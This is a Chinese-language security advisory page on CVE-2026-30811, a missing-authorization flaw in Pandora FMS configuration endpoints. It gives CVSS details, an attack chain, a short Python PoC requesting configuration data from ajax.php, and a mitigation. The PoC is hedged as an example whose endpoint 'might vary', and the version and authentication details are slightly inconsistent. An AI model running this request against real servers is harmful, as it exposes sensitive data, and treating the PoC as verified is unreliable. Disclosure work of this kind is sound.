IPBUF安全漏洞报告
English
CVE-2026-30811 CVSS 6.5 中危

CVE-2026-30811 Pandora FMS未授权访问敏感信息漏洞

披露日期: 2026-04-13

漏洞信息

漏洞编号
CVE-2026-30811
漏洞类型
权限缺失
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Pandora FMS

相关标签

权限缺失敏感信息泄露Pandora FMSCVE-2026-30811

漏洞概述

Pandora FMS在版本777至800之间存在权限缺失漏洞。攻击者可通过网络利用配置端点的授权检查缺失,以低权限身份获取敏感信息。该漏洞CVSS评分为6.5,主要影响系统机密性,无需用户交互即可被利用。

技术细节

该漏洞源于Pandora FMS配置端点未正确实施授权验证机制。在受影响版本(777-800)中,系统允许低权限用户(PR:L)访问本应受保护的配置API或管理页面。攻击者无需复杂的用户交互(UI:N),通过网络向特定端点发送HTTP请求即可绕过限制。由于访问控制缺失(AC:L),攻击者能直接读取敏感配置数据,导致高机密性影响(C:H),但未发现对完整性和可用性的直接影响。

攻击链分析

STEP 1
1. 信息收集
攻击者识别目标网络中运行的Pandora FMS实例及其版本。
STEP 2
2. 获取低权限身份
攻击者注册或获取一个普通用户账号(PR:L),或利用允许未认证访问的配置。
STEP 3
3. 发送恶意请求
攻击者向存在漏洞的配置端点发送特制的HTTP请求,利用缺失的授权检查。
STEP 4
4. 获取敏感数据
服务器返回敏感配置信息,攻击者成功获取数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration endpoint # Replace 'target-ip' with the actual IP of the vulnerable Pandora FMS instance target_url = "http://target-ip/pandora_console/ajax.php" # Example payload to exploit missing authorization on config endpoint # Note: The actual endpoint might vary based on specific version and setup params = { "page": "include/ajax/servers", "get_config": "1" } # The vulnerability implies low privilege is enough, or no auth check on the specific endpoint response = requests.get(target_url, params=params) if response.status_code == 200: print("[+] Successfully retrieved sensitive information:") print(response.text) else: print("[-] Request failed or endpoint not reachable.")

影响范围

Pandora FMS 777
Pandora FMS 778
Pandora FMS 779
Pandora FMS 800

防御指南

临时缓解措施
建议立即检查系统访问控制策略,并在网络边界(如WAF)对配置相关的API路径增加访问控制规则,仅允许受信任的IP访问,直至完成升级。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表